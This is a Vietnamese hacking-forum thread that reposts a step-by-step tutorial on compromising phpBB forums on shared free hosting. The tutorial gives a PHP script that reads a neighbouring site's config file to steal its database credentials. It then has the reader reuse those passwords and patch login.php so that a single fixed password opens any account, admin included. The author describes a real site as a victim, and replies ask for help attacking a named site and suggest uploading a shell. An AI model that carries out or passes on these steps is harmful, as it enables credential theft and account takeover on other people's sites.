banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register  
[Login] Loginhttp  | https  ]
 
Forum Index Thảo luận thâm nhập Thêm một cách hack Local Site  XML
  [Question]   Thêm một cách hack Local Site 19/03/2007 23:45:24 (+0700) | #1 | 47835
[Avatar]
Hts
Member

[Minus]    0    [Plus]
Joined: 15/12/2006 11:01:28
Messages: 193
Location: OEP
Offline
[Profile] [PM]
Nội dung bài viết của Admin trên diễn đàn HVA -2002

###### Header Begin
Project Name: How to hack a localsite
Founder: Luke/Lukos
Found day: 31/08/2002
Use for Education and Experiences Only
###### Header End
Rất tình cờ, khi học PHP tôi tìm ra một cách để hack được một số Web Portal hoặc forum của hầu hết các free hosting như lycos.co.uk vv. Và tỉ lệ thành công là 100% tuy hơi mất thời gian
Trước hết cách này gần như kiểu hack qua Local Exploit để lấy Root's passwd, cái này chắc nhiều bạn cũng đã biết nhưng cũng khác chút ít. Vì vậy tôi cũng chỉ xin lấy một ví dụ là hack phpBB forum để làm mẫu chung cho các kiểu Portal hay forum khác.



Bước 1. Xác định URL website cần hack.
Do đây là free hosting nên website luôn có dạng http://root/yoursite
Và giả sử forum phpBB nằm tại URL sau http://root/victim/phpBB_path/
Chú ý là phải tìm đúng URL Root chứ không phải wwwect hay forward ..
Bước 2. Đăng kí một hosting cùng trên server đó.
Vì đây là free hosting nên nếu victim đăng kí được thì bạn cũng có thể đăng kí dễ dàng
Giả sử bạn đăng kí một hosting như sau http://root/mysite/
Bước 3 Xác định DB info của Victim
Điều này rất dơn giản khi bạn với victim đang cùng trên một Local
Thật vậy có thể là /home/user_root/public_html/mysite/ hay /home/user_root/httpdocs/mysite/ tuỳ thuộc Control Panel của Server là lọai gì (Cpanel, Plesk, Enxim..). Nhưng điều này không cần chú ý.
3.1 Bạn tạo một file để lấy DB info của victim như sau
## getdb.php begin
<?php
$fd = fopen ("../victim/phpBB_path/config.php", "r");
while (!feof ($fd)) {
$line = fgets($fd,4000);
print $line;
}
fclose ($fd);
?>
## getdb.php end
Bạn có thể thay $fd bằng đường dẫn tới bất kì file php mà bạn muốn xem mã nguồn của nó. Vì đối với các loại Portal hoặc forum khác có thể DB Info không chứa trong file config.php như của phpBB
3.2 Upload file getdb.php
Bạn chỉ việc upload lên hosting mà bạn vừa đăng kí http://root/mysite/getdb.php
3.3 Lấy DB info của victim
Chạy file getdb.php vừa rồi trên Browser của bạn. Bạn sẽ thấy một màn hình trắng (blank). Đừng lo, bạn hãy "View source" và bạn sẽ thấy được các thông tin như sau
## getdb.php's source begin
<?php
//
// phpBB 2.x auto-generated config file
// Do not change anything in this file!
//
$dbms = "mysql4";
$dbhost = "localhost";
$dbname = "DB name here";
$dbuser = "DB user here";
$dbpasswd = "DB passwd here";
$table_prefix = "phpbb_";
define('PHPBB_INSTALLED', true);
?>
## getdb.php's source end
Xong bước thứ 3
Bước 4. Kiểm tra mật khẩu mà bạn vừa lấy được.
Với nick Admin trong forum và tất cả những gì có thể liên quan như passwd e-mail, hosting, domain .. Vì có thể nạn nhân dùng 1 passwd cho tất cả những mật khẩu của mình cho đỡ quên. Đây là một trong những thói quen chết người
Nếu mà thành công thì dừng tại đây nếu không hãy sang bước thứ 5
Bước 5. Tạo một mirror phpBB forum.
5.1 Nghĩa là sao, bạn hãy upload một phpBB forum cùng phiên bản với victim vào hosting của bạn http://root/mysite/
Và đừng Install forum này nếu bạn muốn hack nó.
5.2 Config forum vừa upload
Bạn hãy config cho forum của bạn thực sự là một mirror của victim's forum.
Điều đó có nghĩa là bạn phải link DB đến DB của victim, điều đó thật dễ dàng khi bạn đã có được DB info của victim trong tay.
5.2.1 Tạo file config.php
Đó là toàn bộ những gì bạn vừa "view source" được
## config.php source begin
<?php
//
// phpBB 2.x auto-generated config file
// Do not change anything in this file!
//
$dbms = "mysql4";
$dbhost = "localhost";
$dbname = "DB name here";
$dbuser = "DB user here";
$dbpasswd = "DB passwd here";
$table_prefix = "phpbb_";
define('PHPBB_INSTALLED', true);
?>
## config.php source end
5.2.2 Upload config.php
Bạn upload đè lên file config.php trong cái forum mới toanh mà bạn vừa upload.
http://root/mysite/config.php
5.2.3 Thử lại
Bạn thử gõ http://root/mysite/ xem, nếu mà forum của bạn có các thông số y hệt như của http://root/victim/phpBB_path tức là bạn đã thành công bước này
Bước 6. Sửa mã nguồn Mirror Site
Mục đích bước này là bạn sẽ sửa mã nguồn forum của bạn đề bạn có thể Login vào được Admin panel của nó. Nếu bạn học PHP thì việc này khá dễ dàng.
Tôi xin nêu ra 1 phương pháp, đó là cách crack cổ điển.
6.1 Crack cổ điển
6.1.1
Đó là khi bạn muốn crack passwd 1 file exe, bạn có thể deassebler nó ra thành file.asm bằng nhiều chương trình hiện nay
6.1.2
Tìm các lệnh nhảy có điều kiện (JP gì gì đó. Cái này có hàng đống mà). của đoạn code dòi mật khẩu
6.1.3
Sửa thành lệnh nhảy không điều kiên
6.1.4
Compile lại thành file exe và OK. Ta nhập bất cứ mật khẩu nào vào nó cũng chấp nhận
6.2 Sửa mã nguồn
Sửa ở file login.php và sẽ cho phép bạn Login dưới mọi nickname bằng 1 passwd chọn sẵn
6.2.1 Chọn mật khẩu chung cho toàn bộ các nick.
Thực sự các mật khẩu trong phpBB đã được mà hoá theo kiểu MD5, do đó có thể rất khó khăn để có thể giải mã nó. Nếu các bạn hiểu rõ về kiêu encode này thì các bạn có thể tự tìm cho mình mật khẩu thích hợp, nếu không các bạn có thể sử dụng mật khẩu đã được tôi giải mã là: "hainam@hainam.org"
Cái địa chỉ mail của tôi ấy mà, khi mật khẩu này được mã hoá theo MD5 nó sẽ là một mật khẩu như sau "692e2c95b693cf6fbec8ea5c40536b9e"
hainam@hainam.org => 692e2c95b693cf6fbec8ea5c40536b9e
6.2.2 Thiết lập mật khẩu chung cho toàn bộ các nick
Trước hết bạn mở file login.php ra tìm đoạn sau
## file login.php ..
define("IN_LOGIN", true);
define('IN_PHPBB', true);
$phpbb_root_path = './';
include($phpbb_root_path . 'extension.inc');
include($phpbb_root_path . 'common.'.$phpEx);
## file login.php ..
Chèn thêm biến $hack = "692e2c95b693cf6fbec8ea5c40536b9e";
Tức là sửa đoanj mã đó thành
## file login.php ..
define("IN_LOGIN", true);
define('IN_PHPBB', true);
$phpbb_root_path = './';
include($phpbb_root_path . 'extension.inc');
include($phpbb_root_path . 'common.'.$phpEx);
$hack = "692e2c95b693cf6fbec8ea5c40536b9e";
## file login.php ..
Tiếp đó tìm đoạn mã sau
## file login.php ..
else
{
if( md5($password) == $row['user_password'] && $row['user_active'] )
{
$autologin = ( isset($HTTP_POST_VARS['autologin']) ) ? TRUE : 0;
## file login.php ..
Sửa đoạn mã đó thành
## file login.php ..
else
{
if( md5($password) == $hack && $row['user_active'] )
{
$autologin = ( isset($HTTP_POST_VARS['autologin']) ) ? TRUE : 0;
## file login.php ..
Ghi lại file login.php
Bước 7.Login User với mật khẩu đã chọn
Bây giờ bạn có thể login vào diễn đàn qua website của bạn http://root/mysite/login.php với bất cứ nickname nào bằng mật khẩu mà bạn đã chọn. Ở đây là "hainam@hainam.org" kể cả là nick Admin, và vào được Admin Panel ..
Chú ý rằng ở website của bạn thì User chỉ có thể login với mật khẩu là hainam@hainam.org chứ không thể bằng bât kì mật khẩu khác kể cả đó là mật khẩu đúng
Tổng quát
I/Phương Pháp
-Đây là một ví dụ cho việc hack các website khi trong một local, không chỉ riêng đối với phpBB mà có thể áp dụng được cho nhiều Portal hay forum khác, tuy nhiên để có thể hack được từng loại bạn đều phải hiểu rất kĩ về nó và tránh lạm dụng quá đáng.
-Cách hack này tuy mất nhiều thời gian trong việc upload một mirror nhưng rất hiệu quả. Tuy nhiên tuyệt đối không nên sử dụng chúng lung tung và bừa bãi.
-Các hosting cho phép free, điều đó chứng tỏ họ rất tốt bụng, cũng chính vì vậy cũng không nên sử dụng phương pháp này khi KHÔNG THỰC SỰ cần thiết
II/Ví dụ.
-Trước hết tôi xin lỗi những ai đã làm website **** vì tôi sẽ đưa website của các bạn ra làm ví dụ và đã là victim đầu tiên của tôi.
-Mong các bạn, những người đang muốn học hỏi thêm một chút kinh nghiệm chỉ tham qua chứ không lạm dụng gi để làm hỏng DataBase của họ, thực sự tôi đã backup nhưng tôi cũng rất ngại restore lại. Hơn nữa để đảm bảo cho các bài viết tiếp theo không bị phản đối, tôi mong mọi người hãy tôn trọng ý kiến của tôi, KHÔNG PHÁ PHÁCH GÌ DB CỦA VICTIM và mang mục đích học hỏi và tham khảo lên hang đầu.
-Website mirror của website**** là **** , tại đây các bạn có thể login vào bất cứ nickname nào trong diễn đàn **** với mật khẩu chung là "hainam@hainam.org" . hãy nhớ là KHÔNG NÊN PHÁ DB CỦA HỌ, chi nên tham khảo
III/Kinh nghiệm
Điều quan trọng không phải là chúng ta hack được những cái gì mà là chúng ta học được những cái gì. Qua bài viết này mong các bạn nắm rõ được một số thao tác sau
-Đọc mã nguồn của một file bất kì trên website khi đã cùng một server (Bước 3)
-Kinh nghiệm về mật khẩu, dò tìm và ghi nhớ (Bước 4)
-Cách tạo một mirror website hay là cách link DB cho nhiều website (Bước 5)
-Cách crack cổ điển bằng ASM (Bước 6.1)
Các bạn nên tìm ra các mối liên hệ giữa các Portal, Forum, Guest Book, Chatroom PHP-CGI,.. để có thể áp dụng phương pháp này. Mặt khác các bạn cũng có thể hack được ngay cả đối với các domain hosting chứ không phải là các site có dạng http://root/yoursite/ . Và Các Paid hosting cũng không ngaọi trừ khả năng bị hack nếu các hacker đã thực sự muốn hack và sẵn sang bỏ tiền mua một hosting trên cùng một Server. Phần hack paid hosting và domain tôi xin để cho các bạn tự tìm hiểu. Hãy nhớ rằng luôn luôn phải chú ý đến URL Root của mỗi hosting. Ví dụ như ở Cpanel thì URL Root cho các domain hosting là http://[IP Server]/~user .vv
Chúc các bạn thành công
[Up] [Print Copy]
  [Question]   sao em làm hỏng được 26/03/2007 05:13:59 (+0700) | #2 | 49325
lexuanloc
Member

[Minus]    0    [Plus]
Joined: 23/12/2006 23:37:02
Messages: 2
Offline
[Profile] [PM]
em thử với web này và máy web khác o có kết quả ,anh em nào thử làm với web náy coi :http://www.dalatgsm.com/ , vì mình dang cần file trong này .thanks các bác nhiều
[Up] [Print Copy]
  [Question]   sao em làm hỏng được 26/03/2007 05:22:39 (+0700) | #3 | 49327
[Avatar]
gsmth
Elite Member

[Minus]    0    [Plus]
Joined: 15/02/2007 13:25:36
Messages: 749
Offline
[Profile] [PM] [WWW] [Yahoo!]

lexuanloc wrote:
em thử với web này và máy web khác o có kết quả ,anh em nào thử làm với web náy coi :http://www.dalatgsm.com/ , vì mình dang cần file trong này .thanks các bác nhiều
 

Để thực hiện được như bài viết trên thì phải có 1 số điều chứ như safe_mode on hay off, chmod có chặt không, có host cùng site đó không (shared host), ... Sao cứ nói h4ck là đâm đầu vào mà h4ck. smilie)
[Up] [Print Copy]
  [Question]   Re: Thêm một cách hack Local Site 27/03/2007 05:58:57 (+0700) | #4 | 49563
nhungnguoiban19852002
Member

[Minus]    0    [Plus]
Joined: 02/07/2005 08:34:38
Messages: 50
Offline
[Profile] [PM]
smilie Mình đọc thấy mơ hồ lắm, mình phải bắt tay vào học máy bác mới được. Mình thường có tính tò mò, một bộ tuyệt kĩ thiếu lâm hoặc một bí kiếp hay là một tuyệt kiếm đã thất truyền, đó là những lời đồn nhưng có thật. Các bác giỏi thật đó tôi đi tìm mãi những món trên mà không tìm thấy quy ra là những tin đồn nhảm trong giới võ lâm... và tôi cũng đã gác kiếm sống ẩn danh về làm quản trị mạng cho một doanh nghiệp tại Việt Nam Trong một năm nay (kể từ khi website HVA bị hack). Gác kiếm quay về làm quản trị cũng không yên thân vì những chú Virus cúng đầu, những anh bạn Hack kì cựu cũng như những bạn đang tập làm hacker. Nay mãi võ và kết bạn bốn phương, xin được các Bậc tiền bối thu nhận đệ tử.Đệ tử xin được chỉ giáo thêm.! smilie
[Up] [Print Copy]
  [Question]   Re: Thêm một cách hack Local Site 30/03/2007 05:43:50 (+0700) | #5 | 50438
buckky
Member

[Minus]    0    [Plus]
Joined: 28/03/2007 18:35:05
Messages: 1
Location: Santa Clara
Offline
[Profile] [PM]
hị hị,em muốn nộp cái đơn xin làm sãi ở chùa,quanh năm quét lá thổi cơm,giặt đồ cho sư phụ.Thỉnh thoảng học lỏm sư phụ chút cung phu thiếu lâm.Hành tẩu giang hồ 2 năm roài,em cũng chỉ biết gò lưng ra gõ code,site & soft của em make ra cứ bị mấy vị sư phụ nào hack đều đều,khách hàng thì la rằng em viết code tệ,hị hị,em chả bít làm seo.Đang tính bỏ nghề.Hờ hờ
[Up] [Print Copy]
  [Question]   Thêm một cách hack Local Site 05/04/2007 05:41:57 (+0700) | #6 | 51681
Vnese_Venus
Member

[Minus]    0    [Plus]
Joined: 30/08/2006 19:29:53
Messages: 5
Offline
[Profile] [PM] [WWW] [Yahoo!]
Cho em hỏi , làm sao để biết đường dẫn tới host của 1 site nếu nó dùng subdomain dạng xxx.tênchủhost.com/_path/... Cám ơn .
[Up] [Print Copy]
  [Question]   Re: Thêm một cách hack Local Site 05/05/2007 15:27:56 (+0700) | #7 | 57271
[Avatar]
pthanhkim
Member

[Minus]    0    [Plus]
Joined: 06/03/2005 20:07:28
Messages: 27
Offline
[Profile] [PM]
Đọc tới chỗ này mình thấy hơi vui vui. mong các bạn góp chút ý kiến.

3.2 Upload file getdb.php
Bạn chỉ việc upload lên hosting mà bạn vừa đăng kí http://root/mysite/getdb.php  


đâu phải host nào cũng dễ dàng cho bạn upload ?
đã vậy còn không kiểm tra đuôi ".php" nữa

nếu up được thì up luôn con shell cho khỏe. smilie)
[Up] [Print Copy]
  [Question]   Thêm một cách hack Local Site 20/08/2010 20:16:58 (+0700) | #8 | 218762
Gg9x
Member

[Minus]    0    [Plus]
Joined: 25/02/2010 08:16:27
Messages: 7
Offline
[Profile] [PM]
thế nào ấy chứ
mình newbie chả hiểu cái gì cả .
Chỉ mình cách lấy cái URL của nó đi .
Mình thấy khó hiểu thế nào ấy
[Up] [Print Copy]
  [Question]   Thêm một cách hack Local Site 10/09/2010 18:56:37 (+0700) | #9 | 220474
[Avatar]
ctm1455
Member

[Minus]    0    [Plus]
Joined: 01/09/2010 02:29:21
Messages: 9
Offline
[Profile] [PM] [Email] [MSN]
Các bạn hãy chú ý đến từ "host free" phần lớn các "host free" (nếu không muốn nói là tất cả) đều cho phép upload không phân biệt định dạng file nên vấn đề upload các bạn dừng lo đó là tin tốt lành
còn tin xấu là safe mode của các host này luôn luôn là On và Dis hầu như tất cà các lệnh smilie smilie
nếu muốn thử nghiệm thì vào zymic(được mệnh danh là web chicken) đăng ký một host rồi dùng domaintool quét thử những host cùng server sau đó thử nghiệm sẽ biết
ctm1455
[Up] [Print Copy]
  [Question]   Thêm một cách hack Local Site 25/02/2012 12:02:42 (+0700) | #10 | 255267
NewGhost94
Member

[Minus]    0    [Plus]
Joined: 24/02/2012 23:10:48
Messages: 1
Offline
[Profile] [PM]

Warning: fopen(../mobisit/incfiles/db.php) [function.fopen]: failed to open stream: No such file or directory in /home/demo1hsv/public_html/getdb.php on line 3

Warning: feof(): supplied argument is not a valid stream resource in /home/demo1hsv/public_html/getdb.php on line 4

Warning: fgets(): supplied argument is not a valid stream resource in /home/demo1hsv/public_html/getdb.php on line 5

Warning: feof(): supplied argument is not a valid stream resource in /home/demo1hsv/public_html/getdb.php on line 4

Warning: fgets(): supplied argument is not a valid stream resource in /home/demo1hsv/public_html/getdb.php on line 5

Warning: feof(): supplied argument is not a valid stream resource in /home/demo1hsv/public_html/getdb.php on line 4

Warning: fgets(): supplied argument is not a valid stream resource in /home/demo1hsv/public_html/getdb.php on line 5

Warning: feof(): supplied argument is not a valid stream resource in /home/demo1hsv/public_html/getdb.php on line 4

Warning: fgets(): supplied argument is not a valid stream resource in /home/demo1hsv/public_html/getdb.php on line 5

Warning: feof(): supplied argument is not a valid stream resource in /home/demo1hsv/public_html/getdb.php



em chạy toàn thế này thu anh ạ! anh chỉ giúp am với! thank anh
[Up] [Print Copy]
  [Question]   Thêm một cách hack Local Site 10/03/2012 12:12:13 (+0700) | #11 | 257701
v37
Member

[Minus]    0    [Plus]
Joined: 09/03/2012 06:04:59
Messages: 1
Offline
[Profile] [PM]
vừa test , load cã tiếng mà không vào được file getdb
[Up] [Print Copy]
  [Question]   Thêm một cách hack Local Site 13/03/2012 20:46:48 (+0700) | #12 | 258480
congtust24
Member

[Minus]    0    [Plus]
Joined: 16/06/2011 11:27:28
Messages: 1
Offline
[Profile] [PM]
This post is set hidden by a moderator because it may be violating forum's guideline or it needs modification before setting visible to members.
[Up] [Print Copy]
[digg] [delicious] [google] [yahoo] [technorati] [reddit] [stumbleupon]
Go to: 
 Users currently in here 
1 Anonymous

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|